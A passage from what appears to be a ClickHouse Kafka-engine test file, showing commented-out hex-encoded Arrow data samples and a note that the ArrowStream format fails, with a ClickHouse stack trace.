# '\x41\x52\x52\x4f\x57\x31\x00\x00\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x08\x00\x0c\x00\x10\x00\x0c\x00\x00\x00\x00\x00\x03\x00\x3c\x00\x00\x00\x28\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x58\x01\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\x78\x01\x00\x00\x41\x52\x52\x4f\x57\x31',
# '\x41\x52\x52\x4f\x57\x31\x00\x00\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00\x08\x00\x00\x00\x0a\x00\x00\x00\x0c\x00\x00\x00\x0e\x00\x00\x00\x10\x00\x00\x00\x12\x00\x00\x00\x14\x00\x00\x00\x16\x00\x00\x00\x18\x00\x00\x00\x1a\x00\x00\x00\x1c\x00\x00\x00\x1e\x00\x00\x00\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\xff\xff\xff\xff\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x08\x00\x0c\x00\x10\x00\x0c\x00\x00\x00\x00\x00\x03\x00\x3c\x00\x00\x00\x28\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x58\x01\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x00\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\x78\x01\x00\x00\x41\x52\x52\x4f\x57\x31',
# '\x41\x52\x52\x4f\x57\x31\x00\x00\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x08\x00\x0c\x00\x10\x00\x0c\x00\x00\x00\x00\x00\x03\x00\x3c\x00\x00\x00\x28\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x58\x01\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\x78\x01\x00\x00\x41\x52\x52\x4f\x57\x31',
# ],
# },
# 'ArrowStream' : {
# # Not working at all:
# # Error while opening a table: Invalid: Tried reading schema message, was null or length 0, Stack trace (when copying this message, always include the lines below):
# # /src/Processors/Formats/Impl/ArrowBlockInputFormat.cpp:88: DB::ArrowBlockInputFormat::prepareReader() @ 0x1ddff1c3 in /usr/bin/clickhouse
# # /src/Processors/Formats/Impl/ArrowBlockInputFormat.cpp:26: DB::ArrowBlockInputFormat::ArrowBlockInputFormat(DB::ReadBuffer&, DB::Block const&, bool) @ 0x1ddfef63 in /usr/bin/clickhouse
# # /contrib/libcxx/include/memory:2214: std::__1::__compressed_pair_elem<DB::ArrowBlockInputFormat, 1, false>::__compressed_pair_elem<DB::ReadBuffer&, DB::Block const&, bool&&, 0ul, 1ul, 2ul>(std::__1::piecewise_construct_t, std::__1::tuple<DB::ReadBuffer&, DB::Block const&, bool&&>, std::__1::__tuple_indices<0ul, 1ul, 2ul>) @ 0x1de0470f in /usr/bin/clickhouse
# # /contrib/libcxx/include/memory:2299: std::__1::__compressed_pair<std::__1::allocator<DB::ArrowBlockInputFormat>, DB::ArrowBlockInputFormat>::__compressed_pair<std::__1::allocator<DB::ArrowBlockInputFormat>&, DB::ReadBuffer&, DB::Block const&, bool&&>(std::__1::piecewise_construct_t, std::__1::tuple<std::__1::allocator<DB::ArrowBlockInputFormat>&>, std::__1::tuple<DB::ReadBuffer&, DB::Block const&, bool&&>) @ 0x1de04375 in /usr/bin/clickhouse
# # /contrib/libcxx/include/memory:3569: std::__1::__shared_ptr_emplace<DB::ArrowBlockInputFormat, std::__1::allocator<DB::ArrowBlockInputFormat> >::__shared_ptr_emplace<DB::ReadBuffer&, DB::Block const&, bool>(std::__1::allocator<DB::ArrowBlockInputFormat>, DB::ReadBuffer&, DB::Block const&, bool&&) @ 0x1de03f97 in /usr/bin/clickhouse
# # /contrib/libcxx/include/memory:4400: std::__1::enable_if<!(is_array<DB::ArrowBlockInputFormat>::value), std::__1::shared_ptr<DB::ArrowBlockInputFormat> >::type std::__1::make_shared<DB::ArrowBlockInputFormat, DB::ReadBuffer&, DB::Block const&, bool>(DB::ReadBuffer&, DB::Block const&, bool&&) @ 0x1de03d4c in /usr/bin/clickhouse
# # /src/Processors/Formats/Impl/ArrowBlockInputFormat.cpp:117: DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) const @ 0x1de0273f in /usr/bin/clickhouse
# # /contrib/libcxx/include/type_traits:3519: decltype(std::__1::forward<DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1&>(fp)(std::__1::forward<DB::ReadBuffer&>(fp0), std::__1::forward<DB::Block const&>(fp0), std::__1::forward<DB::RowInputFormatParams const&>(fp0), std::__1::forward<DB::FormatSettings const&>(fp0))) std::__1::__invoke<DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1&, DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&>(DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1&, DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) @ 0x1de026da in /usr/bin/clickhouse
# # /contrib/libcxx/include/__functional_base:317: std::__1::shared_ptr<DB::IInputFormat> std::__1::__invoke_void_return_wrapper<std::__1::shared_ptr<DB::IInputFormat> >::__call<DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1&, DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&>(DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1&, DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) @ 0x1de025ed in /usr/bin/clickhouse
# # /contrib/libcxx/include/functional:1540: std::__1::__function::__alloc_func<DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1, std::__1::allocator<DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1>, std::__1::shared_ptr<DB::IInputFormat> (DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&)>::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) @ 0x1de0254a in /usr/bin/clickhouse
# # /contrib/libcxx/include/functional:1714: std::__1::__function::__func<DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1, std::__1::allocator<DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1>, std::__1::shared_ptr<DB::IInputFormat> (DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&)>::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) @ 0x1de0165c in /usr/bin/clickhouse
# # /contrib/libcxx/include/functional:1867: std::__1::__function::__value_func<std::__1::shared_ptr<DB::IInputFormat> (DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&)>::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) const @ 0x1dd14dbd in /usr/bin/clickhouse
# # /contrib/libcxx/include/functional:2473: std::__1::function<std::__1::shared_ptr<DB::IInputFormat> (DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&)>::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) const @ 0x1dd07035 in /usr/bin/clickhouse
# # /src/Formats/FormatFactory.cpp:258: DB::FormatFactory::getInputFormat(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&, DB::ReadBuffer&, DB::Block const&, DB::Context const&, unsigned long, std::__1::function<void ()>) const @ 0x1dd04007 in /usr/bin/clickhouse
# # /src/Storages/Kafka/KafkaBlockInputStream.cpp:76: DB::KafkaBlockInputStream::readImpl() @ 0x1d8f6559 in /usr/bin/clickhouse
# # /src/DataStreams/IBlockInputStream.cpp:60: DB::IBlockInputStream::read() @ 0x1c9c92fd in /usr/bin/clickhouse
# # /src/DataStreams/copyData.cpp:26: void DB::copyDataImpl<DB::copyData(DB::IBlockInputStream&, DB::IBlockOutputStream&, std::__1::atomic<bool>*)::$_0&, void (&)(DB::Block const&)>(DB::IBlockInputStream&, DB::IBlockOutputStream&, DB::copyData(DB::IBlockInputStream&, DB::IBlockOutputStream&, std::__1::atomic<bool>*)::$_0&, void (&)(DB::Block const&)) @ 0x1c9ea01c in /usr/bin/clickhouse
# 'data_sample' : [
